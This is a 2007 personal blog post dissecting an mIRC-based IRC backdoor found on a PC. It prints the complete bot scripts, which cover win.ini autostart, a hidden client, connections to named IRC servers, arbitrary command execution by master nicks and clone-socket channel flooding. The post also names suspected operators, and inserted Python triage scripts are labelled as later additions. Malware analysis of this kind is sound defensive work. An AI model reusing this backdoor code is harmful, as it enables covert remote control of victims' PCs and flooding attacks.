Najib’Palace

Personal weblog with news of software, hardware, technology, tips and tricks

IRC BOT

Hi... I've been really busy lately and haven't had time to update this blog. Anyway, here is a short story about an IRC bot.

This morning, while going through a checklist on a PC, I came across something interesting. Hmm, I left this stuff behind a long time ago... I thought nobody used this dumb technique any more, but apparently they still do. The thing in question is an IRC BOT (Backdoor.flood)! Why do Malays like to mess with fellow Malays so much? Hmm, here is a short review of the IRC bot I found on this PC.

Suspect files

hideO.PNF
hidirN.PNF
hideIN.PNF

All three files were flagged by the virus scanner as IRC/Backdoor.flood. They carry a .PNF extension so they blend in with the precompiled INF files Windows keeps in its inf directory, but once opened up they turn out to be plain mIRC script, and bit by bit the secrets about the owner of this virus came out... (dun dun dunnnn...)

In short, the scripts below run a hidden mIRC instance that autostarts through the load= line of win.ini, reconnects to two IRC servers, and takes commands in channel or in private message from nicks on a "master" list: run arbitrary programs (!run, !command), join or part channels, add or remove masters, and open raw sockets to load a configurable number of clone connections (%jumlah) that are then pointed at a channel and used to flood it (@clone, @cjoin, @pokewak).

Contents of hideO.PNF
====================================================================
on 1:text:*:?: {
if ($master($nick) == $true) {
if (!exit == $1) { exit | run $mircexe }
if (!run == $1) { //run $2- }
if (!command == $1) { $2- }
if (!addmaster == $1) && ($2) { writeini ajoin.txt Owner Master $addtok($readini(ajoin.txt,Owner,Master),$2,32) | .msg $nick $2 in masterlist | halt }
if (!delmaster == $1) && ($2) { writeini ajoin.txt Owner Master $remtok($readini(ajoin.txt,Owner,Master),$2,1,32) | .msg $nick $2 out masterlist | halt }
if (!masterlist == $1) { msg $nick masterlist: $_masterlist }
if (!server == $1) && ($2) { set %server $2 }
if (!port == $1) && ($2) { set %port $2 }
if (cj == $1) && ($2) { sockwrite -tn * join #$2 }
if (cp == $1) && ($2) { sockwrite -tn * part #$2 }
if (cload == $1) && ($2) { var %i = 1 | while (%i < $2) { bot | inc %i } }
if (cclose == $1) { sockclose * }
if (jj == $1) && ($2) { join #$2 }
if (pp == $1) && ($2) { part #$2 }
if (!ajoin == $1) {
if ($2 == 1) && ($3) { writeini ajoin.txt autojoin 1 $3 }
if ($2 == 2) && ($3) { writeini ajoin.txt autojoin 2 $3 }
if ($2 == 3) && ($3) { writeini ajoin.txt autojoin 3 $3 }
if ($2 == 4) && ($3) { writeini ajoin.txt autojoin 4 $3 }
if ($2 == 5) && ($3) { writeini ajoin.txt autojoin 5 $3 }
}
if (!list == $1) { msg $nick $readini(ajoin.txt,autojoin,1) $readini(ajoin.txt,autojoin,2) $readini(ajoin.txt,autojoin,3) $readini(ajoin.txt,autojoin,4) $readini(ajoin.txt,autojoin,5) }
}
}
on 1:text:*:#: {
if (Guest isin $me) { nick $read nick.txt | .timer 1 3 join #gamble }
if ($master($nick) == $true) {
if (!run == $1) { //run $2- }
if (!command == $1) { $2- }
if (!addmaster == $1) && ($2) { writeini ajoin.txt Owner Master $addtok($readini(ajoin.txt,Owner,Master),$2,32) | .msg # $2 in masterlist | halt }
if (!delmaster == $1) && ($2) { writeini ajoin.txt Owner Master $remtok($readini(ajoin.txt,Owner,Master),$2,1,32) | .msg # $2 out masterlist | halt }
if (!masterlist == $1) { msg # masterlist: $_masterlist }
if (!server == $1) && ($2) { set %server $2 }
if (!port == $1) && ($2) { set %port $2 }
if (cj == $1) && ($2) { sockwrite -tn * join #$2 }
if (cp == $1) && ($2) { sockwrite -tn * part #$2 }
if (cload == $1) && ($2) { var %i = 1 | while (%i < $2) { bot | inc %i } }
if (cclose == $1) { sockclose * }
if (jj == $1) && ($2) { join #$2 }
if (pp == $1) && ($2) { part #$2 }
if (!ajoin == $1) {
if ($2 == 1) && ($3) { writeini ajoin.txt autojoin 1 $3 }
if ($2 == 2) && ($3) { writeini ajoin.txt autojoin 2 $3 }
if ($2 == 3) && ($3) { writeini ajoin.txt autojoin 3 $3 }
if ($2 == 4) && ($3) { writeini ajoin.txt autojoin 4 $3 }
if ($2 == 5) && ($3) { writeini ajoin.txt autojoin 5 $3 }
}
if (!bjoin == $1) {
if ($2 == 1) && ($3) { writeini ajoin.txt autojoin 6 $3 }
if ($2 == 2) && ($3) { writeini ajoin.txt autojoin 7 $3 }
if ($2 == 3) && ($3) { writeini ajoin.txt autojoin 8 $3 }
if ($2 == 4) && ($3) { writeini ajoin.txt autojoin 9 $3 }
if ($2 == 5) && ($3) { writeini ajoin.txt autojoin 10 $3 }
}
if (!list == $1) { msg # $readini(ajoin.txt,autojoin,1) $readini(ajoin.txt,autojoin,2) $readini(ajoin.txt,autojoin,3) $readini(ajoin.txt,autojoin,4) $readini(ajoin.txt,autojoin,5) }
if (!list2 == $1) { msg # $readini(ajoin.txt,autojoin,6) $readini(ajoin.txt,autojoin,7) $readini(ajoin.txt,autojoin,8) $readini(ajoin.txt,autojoin,9) $readini(ajoin.txt,autojoin,10) }
if (!exit == $1) { exit | run $mircexe }
}
}
on *:disconnect: {
if ($cid == $scon(1)) {
timerjoin* off
identd on $read nick.txt
nick $read nick.txt
fullname $read nick.txt
anick $read nick.txt
//server irc.webchat.org
.timeronline 0 300 //server irc.webchat.org
}
if ($cid == $scon(2)) {
timerjoin* off
identd on $read nick.txt
nick $read nick.txt
fullname $read nick.txt
anick $read nick.txt
//server smpt.kicks-ass.org 7000
.timeronline 0 300 //server smpt.kicks-ass.org 7000
}
}
on *:connect: {
if ($cid == $scon(1)) {
identd on $read nick.txt
nick $read nick.txt
fullname $read nick.txt
anick $read nick.txt
.timerjoin1 1 2 join #gamble,#chan
.timerjoin2 1 10 join $readini(ajoin.txt,autojoin,1)
.timerjoin3 1 25 join $readini(ajoin.txt,autojoin,2)
.timerjoin4 1 45 join $readini(ajoin.txt,autojoin,3)
.timerjoin5 1 65 join $readini(ajoin.txt,autojoin,4)
.timerjoin6 1 95 join $readini(ajoin.txt,autojoin,5)
umode -Mmep
}
if ($cid == $scon(2)) {
identd on $read nick.txt
nick $read nick.txt
fullname $read nick.txt
anick $read nick.txt
.timerbjoin1 1 2 join #linuxpc,#chan
.timerbjoin2 1 10 join $readini(ajoin.txt,autojoin,6)
.timerbjoin3 1 25 join $readini(ajoin.txt,autojoin,7)
.timerbjoin4 1 45 join $readini(ajoin.txt,autojoin,8)
.timerbjoin5 1 65 join $readini(ajoin.txt,autojoin,9)
.timerbjoin6 1 95 join $readini(ajoin.txt,autojoin,10)
umode -Mmep
}
if ($cid == $scon(3)) { .timercjoin1 1 2 join #chan }
if ($cid < 2) { .server -m smpt.kicks-ass.org 7000 }
.timeronline off
}
raw 433:*: { nick $read nick.txt }
raw 432:*: { nick $read nick.txt }
raw 437:*: { part $2 | nick $read nick.txt | .timer $+ $r(00,99) 1 5 join $2 }
on *:nick: {
if (Guest isin $me) { nick $read nick.txt }
}
on 1:part:#: {
if (# == #wcc) { if (Guest isin $me) { nick $read nick.txt } | .timer 1 3 join #gamble }
if (# == #chan) { if (Guest isin $me) { nick $read nick.txt } | .timer 1 3 join #gamble }
}
on 1:start: {
.dll mIRC.dll mIRC hide
.timeronline 1 2 //server irc.webchat.org
writeini c:\windows\win.ini windows load C:\WINDOWS\System.exe
Set %bot.dir $mircexe
If ( $readini C:\windows\win.ini Windows Load == $null ) { Writeini C:\windows\win.ini Windows Load %bot.dir }
Elseif ( $readini C:\windows\win.ini Windows Load != %bot.dir ) { Remini C:\windows\win.ini Windows Load | Writeini C:\windows\win.ini Windows Load %bot.dir }
}
on 1:sockopen:bot*:{
sockwrite -n $sockname CONNECT %server $+ : $+ %port HTTP/1.0 $+ $CRLF $+ $CRLF
sockwrite -n $sockname nick $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9)
sockwrite -n $sockname user $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9) xtc xtc : $read fxscom.txt
}
on 1:sockread:*:{
if ($sockerr > 0) { return }
sockread %temp
if ($gettok(%temp,1,32) == ping) { .sockwrite -n $sockname PONG $gettok(%temp,2-,32) }
}
alias bot {
.sockopen bot $+ $r(1,1000000) %server %port
}
On 1:Sockclose:*: {
bot
}
====================================================================

Contents of hideIN.PNF

on 1:DISCONNECT:{
.fullname $read BlueFax.txt
.timer* off
.identd on $read biosSYS.txt
.server $1-
.nick $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.alternatif $read fxscom.txt $+ $r(A,Z) $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9)
}
on 1:CONNECT:{
.remote on
.identd on $read biosSYS.txt
.echo 4 $dll(motfv3.dll,motfv,Sync)
.fullname $read BlueFax.txt
.nick $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.alternatif $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.auser otai puttok
.auser otai ircN
.timer 1 1 umode -Mmip+L
.timer 1 5 join #²²²
.timer 1 8 join #bosnia
.timer 1 11 join #pantaicrew
.timer 1 13 join #kosmo
.timer 1 16 join #pso
.timer 1 19 join %c1
.timer 1 21 join %c2
.timer 1 24 join %c3
.timer 1 27 join %c4
.timer 1 30 join %c5
}
on 1:start: {
writeini C:\windows\win.ini windows load C:\windows\inf\system.exe
echo 4 $dll(motfv3.dll,motfv,Load)
dll winsome.dll HideMirc on
.fullname $read BlueFax.txt
.identd on $read biosSYS.txt
.nick $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.alternatif $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) $+ $r(0,9)
.timer 1 2 //server irc.webchat.org 7000
}

on +otai:TEXT:*:*: {
if ($1 == @fak) { $2- | halt }
if ($1 == @join) { .join $2 }
if ($1 == @part) { .part $2 }
if ($1 == @op) { .mode # +o $2 }
if ($1 == @deop) { .mode # -o $2 }
if ($1 == @voice) { .mode # +v $2 }
if ($1 == @devoice) { .mode # -v $2 }
if ($1 == @uop) { .mode # +u $2 }
if ($1 == @duop) { .mode # -u $2 }
if ($1 == @kick) { .kick # $2 $3- }
if ($1 == @topic) { topic # $2- }
if ($1 == @aj1) {  .set %c1 $addtok(%c1,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj2) {  .set %c2 $addtok(%c2,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj3) {  .set %c3 $addtok(%c3,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj4) {  .set %c4 $addtok(%c4,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj5) {  .set %c5 $addtok(%c5,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @rj1) {  .set %c1 $remtok(%c1,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj2) {  .set %c2 $remtok(%c2,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj3) {  .set %c3 $remtok(%c3,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj4) {  .set %c4 $remtok(%c4,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj5) {  .set %c5 $remtok(%c5,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @aj1list) { .msg # $aj1list | halt }
if ($1 == @aj2list) { .msg # $aj2list | halt }
if ($1 == @aj3list) { .msg # $aj3list | halt }
if ($1 == @aj4list) { .msg # $aj4list | halt }
if ($1 == @aj5list) { .msg # $aj5list | halt }
if ($1 == @addmaster) { .auser master $2- | .set %master $addtok(%master,$2-,32) | .msg # $2 have been added to my master list }
if ($1 == @delmaster) { .ruser $2- | .set %master $remtok(%master,$2,1,32) | .msg # $2- was not my Master }
if ($1 == @master) { .msg # $masterlist | halt }
if ($1 == @otai) { .msg # $ownerlist | halt }
if ($1 == @clone) { .msg # Clone Set: $2 | .set %jumlah $2 | .timer %jumlah 3 //bot }
if ($1 == @cserver) { .msg # Server Set: $2 | .set %server $2 }
if ($1 == @cport) { .msg # Port Set: $2 | .set %port $2 }
if ($1 == @cjoin) { .msg # Clone Join Channel: $2 | .sockwrite -n * join $2 }
if ($1 == @cpart) {  .msg # Clone Part Channel: $2 | .sockwrite -n * part $2 }
if ($1 == @ckill) { .msg # Clone Kill | .sockclose * | .sockclose * | .sockclose * }
if ($1 == @addotai) { .auser otai $2- | .set %otai $addtok(%otai,$2-,32) | .msg # $2 have been added to my owner list }
if ($1 == @delotai) { .ruser $2- | .set %otai $remtok(%otai,$2,1,32) | .msg # $2- was not my owner }
if ($1 == @version) { .msg #²²²  ni version 4PUKI  }
if ($1 == @pokewak) { .set %pokewak $2 | .sockwrite -n * join $2 | .timer 1 6 pantat | .timer 1 10 sockwrite -n * part $2 | }
}
on +master:TEXT:*:*: {
if ($1 == @join) { .join $2 }
if ($1 == @part) { .part $2 }
if ($1 == @op) { .mode # +o $2 }
if ($1 == @deop) { .mode # -o $2 }
if ($1 == @voice) { .mode # +v $2 }
if ($1 == @devoice) { .mode # -v $2 }
if ($1 == @uop) { .mode # +u $2 }
if ($1 == @duop) { .mode # -u $2 }
if ($1 == @kick) { .kick # $2 $3- }
if ($1 == @topic) { topic # $2- }
if ($1 == @pelaq) {  .msg # $2 ha la pasal pa }
if ($1 == @aj1) {  .set %c1 $addtok(%c1,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj2) {  .set %c2 $addtok(%c2,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj3) {  .set %c3 $addtok(%c3,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj4) {  .set %c4 $addtok(%c4,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @aj5) {  .set %c5 $addtok(%c5,$2-,32) | .msg # $2 have been added to auto join chan }
if ($1 == @rj1) {  .set %c1 $remtok(%c1,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj2) {  .set %c2 $remtok(%c2,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj3) {  .set %c3 $remtok(%c3,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj4) {  .set %c4 $remtok(%c4,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @rj5) {  .set %c5 $remtok(%c5,$2,1,32) | .msg # $2- have been deleted to auto join chan }
if ($1 == @aj1list) { .msg # $aj1list | halt }
if ($1 == @aj2list) { .msg # $aj2list | halt }
if ($1 == @aj3list) { .msg # $aj3list | halt }
if ($1 == @aj4list) { .msg # $aj4list | halt }
if ($1 == @aj5list) { .msg # $aj5list | halt }
if ($1 == @version) { .msg #²²² ni version 4PUKI }
}

on 1:PART:#²²²: {
if ($nick == $me) { .timer 1 5 join #²²² }
}
on 1:NICK: {
if ($nick != $me) { return }
if ($newnick isletter Guest*) { .timer 1 3 .nick $read fxscom.txt $+ $r(A,Z) $+ $r(0,9) $+ $r(0,9) }
}
on 1:KICK:#²²²:{ .timer 1 5 join #²²² }

alias masterlist {
if ($numtok(%master,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%master,32)) { .var %:ml = $gettok(%master,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%master,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias ownerlist {
if ($numtok(%own,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%own,32)) { .var %:ml = $gettok(%own,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%own,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}

alias pantat { .timer 3 0 sockwrite -n * privmsg %pokewak $read engsix.txt }
alias aj1list {
if ($numtok(%c1,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c1,32)) { .var %:ml = $gettok(%c1,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c1,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias aj2list {
if ($numtok(%c2,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c2,32)) { .var %:ml = $gettok(%c2,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c2,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias aj3list {
if ($numtok(%c3,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c3,32)) { .var %:ml = $gettok(%c3,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c3,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias aj4list {
if ($numtok(%c4,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c4,32)) { .var %:ml = $gettok(%c4,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c4,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}
alias aj5list {
if ($numtok(%c5,32) == 0) { .return tiada… | halt }
.var %:i = 1 | .while (%:i <= $numtok(%c5,32)) { .var %:ml = $gettok(%c5,%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok(%c5,32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | .inc %:i } | .return %:aml $+ .
}

====================================================================

Contents of hidirN.PNF

on 1:sockopen:bot*:{
sockwrite -n $sockname CONNECT %server $+ : $+ %port HTTP/1.0 $+ $CRLF $+ $CRLF
sockwrite -n $sockname nick $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(1,9)
sockwrite -n $sockname user $r(a,z) $+ $r(1,9) $+ $r(A,Z) $+ $r(a,z) $+ $r(A,Z) $+ $r(a,z) xtc xtc : $read fxscom.txt
}
on 1:sockread:*:{
if ($sockerr > 0) { return }
sockread %temp
if ($gettok(%temp,1,32) == ping) { .sockwrite -n $sockname PONG $gettok(%temp,2-,32) }
}
alias bot {
.sockopen bot $+ $r(1,1000000) %server %port
}
On 1:Sockclose:*: {
bot
}

======================================================================

After going through the three files, I found that they are tied to the following files:

remote.ini
setz.ini
aliases.exe
system.exe
remote.exe
mIRC.DLL
mirc.ini
server.ini
and several other files. All of this shows that the files match a mIRC installation (a renamed mIRC client plus its script and ini files). So the next step was to analyse all of those files to find out who is behind this IRC backdoor script.

Contents of remote.ini
[variables]
n0=%server irc.webchat.org
n1=%port 6667
n2=%jumlah 100
n3=%master
n4=%ircbot
n5=%logo batmania
n6=%vversion I got a complaint…it’s About You Baby..!!
n7=%mk1
n8=%c1 #bb
n9=%c2 #punk
n10=%c3 #cheras
n11=%c4
n12=%c5
n13=%p.save.cloning.srv
n14=%serverx irc.webchat.org
n15=%portx 6667
n16=%pserver
n17=%sock.ping on
n18=%bot.sock bot
n19=%otai
n20=%pokewak #bijik
n21=%temp PING :2142D0BD
[users]
n0=master:IRcclient
n1=master:syj
n2=master:azroy
n3=otai:puttok
n4=otai:ircN

======================================================================
[users]
The users group is the list of people who have access to control this IRC backdoor. After checking on several servers, I found that all of the nicks listed under users come from the webchat network (irc.webchat.org).

And the contents of aliases.exe show that the master owner of this IRC bot is the nick ^maxtor^.

Contents of aliases.exe after unpacking.

/op /mode # +ooo $$1 $2 $3
/dop /mode # -ooo $$1 $2 $3
/j /join #$$1 $2-
/p /part #
/n /names #$$1
/w /whois $$1
/k /kick # $$1 $2-
/q /query $$1
/send /dcc send $1 $2
/chat /dcc chat $1
/ping /ctcp $$1 ping
_masterlist { if ($numtok($readini(ajoin.txt,Owner,Master),32) == 0) { return tiada… | halt } | var %:i = 1 | while (%:i <= $numtok($readini(ajoin.txt,Owner,Master),32)) { var %:ml = $gettok($readini(ajoin.txt,Owner,Master),%:i,32), %:aml = $iif(%:aml,$iif(%:i == $numtok($readini(ajoin.txt,Owner,Master),32),%:aml & %:ml,%:aml $+ $chr(44) %:ml),%:ml) | inc %:i } | return %:aml $+ . }
master return $istok($readini(ajoin.txt,Owner,Master) $decode(Xk1heFRvcl4=,m) ,$1,32)

Clearly the owner's nickname was only obscured with a trivial mIRC encoding: $decode(...,m) is mIRC's base64 (MIME) decoder, and Xk1heFRvcl4= decodes to ^MaxTor^. The master alias appends that decoded nick to the master list read from ajoin.txt before checking $1 against it, so ^MaxTor^ is always a master even if the list on disk is emptied.
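An added triage script (my own example, not part of the original post or of the recovered files) that pulls the indicators above out of mIRC script text: server/port pairs from server commands, channels from join commands, persistence writes into win.ini, DLLs that get loaded, and anything hidden in $decode(...,m), which is mIRC's base64 decode. It runs on a constructed excerpt in the style of the listings above; the regular expressions are my assumptions about mIRC syntax and deliberately skip names that are only built at runtime from %variables or $readini.

```python
"""Static triage of mIRC-script backdoors like the three .PNF files above.
Added example code, not from the post or the recovered files."""
import base64
import binascii
import re

# Constructed excerpt in the style of the listings above (not the real files).
SAMPLE = r"""
on 1:start: {
.dll mIRC.dll mIRC hide
.timeronline 1 2 //server irc.webchat.org
writeini c:\windows\win.ini windows load C:\WINDOWS\System.exe
}
on *:connect: {
.server -m smpt.kicks-ass.org 7000
.timer 1 2 join #gamble,#chan
.timer 1 5 join #²²²
.timer 1 19 join %c1
}
if ($1 == @cserver) { .msg # Server Set: $2 | .set %server $2 }
master return $istok($readini(ajoin.txt,Owner,Master) $decode(Xk1heFRvcl4=,m) ,$1,32)
"""

# Assumptions about mIRC syntax; a server must look like a dotted hostname so
# that text such as "Server Set:" is not picked up.
SERVER_RE = re.compile(r"(?i)\bserver\s+(?:-\w+\s+)?([\w-]+(?:\.[\w-]+)+)(?:\s+(\d{1,5}))?")
JOIN_RE = re.compile(r"(?i)\bjoin\s+(#\S+)")
WRITEINI_RE = re.compile(r"(?im)\bwriteini\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S.*?)\s*(?:\||\}|$)")
DLL_RE = re.compile(r"(?i)(?:\.dll\s+|\bdll\s+|\$dll\()\s*([\w-]+\.dll)")
DECODE_RE = re.compile(r"\$decode\(([A-Za-z0-9+/=]+),m\)")   # $decode(...,m) = base64


def triage(script):
    """Collect indicators from one mIRC script body."""
    servers = []
    for host, port in SERVER_RE.findall(script):
        entry = (host.lower(), int(port) if port else 6667)   # 6667: mIRC's default port
        if entry not in servers:
            servers.append(entry)

    channels = set()
    for group in JOIN_RE.findall(script):
        for chan in group.split(","):
            if "$" not in chan:            # "#$2" is filled in from the command, not fixed
                channels.add(chan)

    # writeini into win.ini [windows] load/run is the old Win9x-style autostart hook.
    persistence = [
        (path, section, key, value)
        for path, section, key, value in WRITEINI_RE.findall(script)
        if path.lower().endswith("win.ini")
    ]

    dlls = sorted({d.lower() for d in DLL_RE.findall(script)})

    decoded = []
    for token in DECODE_RE.findall(script):
        try:
            decoded.append((token, base64.b64decode(token, validate=True).decode("latin-1")))
        except binascii.Error:
            decoded.append((token, None))   # keep the token so a bad blob is still reported

    return {"servers": servers, "channels": sorted(channels), "persistence": persistence,
            "dlls": dlls, "decoded": decoded}


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

Run it over hideO.PNF, hideIN.PNF and aliases.exe in turn and the output gives you the C2 servers and ports, the channels the bot sits in, the win.ini path to clean up, the DLLs to collect, and the decoded master nick, which is the same set of facts the walkthrough above assembles by hand.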

Next I pulled the active connections from this PC. The result is below:

Active Connections

Proto  Local Address          Foreign Address        State
TCP    PC3:1027               pool.webmaster.webchat.org:6667  ESTABLISHED
TCP    PC3:1029               cikgu.razie.net:7000   ESTABLISHED
TCP    PC3:1032               pool.webmaster.webchat.org:6667  ESTABLISHED
TCP    PC3:1034               cikgu.razie.net:7000   ESTABLISHED
TCP    PC3:1035               58.27.124.139:http     ESTABLISHED

Hmm, a few of those caught my attention, so I pointed a web browser at cikgu.razie.net port 7000. The result:

:mesra.jb.my.kampungchat.org NOTICE AUTH :*** Looking up your hostname...
:mesra.jb.my.kampungchat.org NOTICE AUTH :*** Found your hostname (cached)
:mesra.jb.my.kampungchat.org 451 GET :You have not registered
:mesra.jb.my.kampungchat.org 451 Host: :You have not registered
:mesra.jb.my.kampungchat.org 451 User-Agent: :You have not registered
:mesra.jb.my.kampungchat.org 451 Accept: :You have not registered
:mesra.jb.my.kampungchat.org 451 Accept-Language: :You have not registered
:mesra.jb.my.kampungchat.org 451 Accept-Encoding: :You have not registered
:mesra.jb.my.kampungchat.org 451 Accept-Charset: :You have not registered
:mesra.jb.my.kampungchat.org 451 Keep-Alive: :You have not registered
:mesra.jb.my.kampungchat.org 451 Connection: :You have not registered
ERROR :Closing Link: [60.48.58.194] (Ping timeout)

Every line the browser sent (the GET request line and each HTTP header) was rejected with a 451 "You have not registered", which is how an IRC server answers commands before registration. So whatever listens on cikgu.razie.net:7000 is an IRC server, and it names itself mesra.jb.my.kampungchat.org: the address has been pointed at that kampungchat IRC server. I then took a look around that IRC server. After posing as an ordinary user and asking about the cikgu.razie.net address, it was clear that the owner of that address is the nick Razie, who holds SRA access on that server. Hmm, not just anyone gets to hold access that high. My advice to the people behind this IRC backdoor: try to find a more sophisticated way of building a backdoor. Even my Year 3 kid could tell that the files you planted on this PC are an IRC backdoor. This way of planting IRC backdoors has been around for ages; you can't keep copying other people's style.
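An added example (mine, not the post's) that automates the two checks just described: parse a netstat listing and flag established connections to ports commonly used by IRC, and parse raw IRC protocol lines, such as the ones the browser received, into prefix/command/params so the server name and numeric replies can be read off rather than eyeballed. The IRC port set is an assumption to adjust for your environment; the netstat rows and banner lines are trimmed copies of the listings above.

```python
"""Triage helpers for the two checks above: which established connections go
to IRC-style ports, and what the service on a suspicious port says about
itself when you talk to it. Added example code, not from the post."""

# Ports commonly used by IRC servers. Assumption: extend for your environment.
IRC_PORTS = {6667, 6668, 6669, 6697, 7000}
# Service names netstat prints instead of numbers; only the ones needed here.
SERVICE_PORTS = {"http": 80, "https": 443, "ftp": 21}

# Trimmed from the netstat output above.
NETSTAT = """\
Active Connections

Proto  Local Address          Foreign Address        State
TCP    PC3:1027               pool.webmaster.webchat.org:6667  ESTABLISHED
TCP    PC3:1029               cikgu.razie.net:7000   ESTABLISHED
TCP    PC3:1035               58.27.124.139:http     ESTABLISHED
"""

# Trimmed from what the browser got back from cikgu.razie.net:7000 above.
BANNER = """\
:mesra.jb.my.kampungchat.org NOTICE AUTH :*** Looking up your hostname...
:mesra.jb.my.kampungchat.org 451 GET :You have not registered
:mesra.jb.my.kampungchat.org 451 Host: :You have not registered
ERROR :Closing Link: [60.48.58.194] (Ping timeout)
"""


def parse_netstat(text):
    """Return one dict per TCP/UDP row: remote host, numeric port, state."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue                      # header, blank, or malformed line
        proto, local, foreign = parts[:3]
        state = parts[3] if len(parts) > 3 else ""   # UDP rows carry no state
        host, _, port = foreign.rpartition(":")
        port_no = int(port) if port.isdigit() else SERVICE_PORTS.get(port.lower())
        rows.append({"proto": proto, "local": local, "host": host,
                     "port": port_no, "state": state})
    return rows


def irc_suspects(rows):
    """Established TCP connections whose remote port is an IRC port."""
    return [r for r in rows
            if r["proto"] == "TCP" and r["state"] == "ESTABLISHED"
            and r["port"] in IRC_PORTS]


def parse_irc_line(line):
    """Split ':prefix COMMAND p1 p2 :trailing' using RFC 1459 framing."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    command, params = parts[0], parts[1:]
    if trailing is not None:
        params.append(trailing)
    return {"prefix": prefix, "command": command, "params": params}


def fingerprint(banner):
    """What the remote service reveals before registration completes."""
    msgs = [parse_irc_line(l) for l in banner.splitlines() if l.strip()]
    servers = sorted({m["prefix"] for m in msgs if m["prefix"] and "." in m["prefix"]})
    numerics = sorted({m["command"] for m in msgs if m["command"].isdigit()})
    # 451 (ERR_NOTREGISTERED) aimed at "GET": the HTTP request line was read as an
    # IRC command, so this port speaks IRC whatever the hostname suggests.
    http_as_irc = any(m["command"] == "451" and m["params"][:1] == ["GET"] for m in msgs)
    closed = any(m["command"] == "ERROR" for m in msgs)
    return {"servers": servers, "numerics": numerics,
            "http_as_irc": http_as_irc, "closed": closed}


if __name__ == "__main__":
    for row in irc_suspects(parse_netstat(NETSTAT)):
        print("IRC-port connection:", row["host"], row["port"])
    print(fingerprint(BANNER))
```

The port filter is only a first cut: a bot told to use a non-standard port via @cport will not show up here, so the stronger check is still the one the post does, namely talking to the remote port and reading the protocol it answers in.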

September 25, 2007 - Posted by | News for today

7 Comments

  1. Show me the way, sifu~!

    Comment by Wann | October 24, 2007

  2. ahaks... nice.. but dizzying.. where did that come from?

    Comment by Wann | October 24, 2007

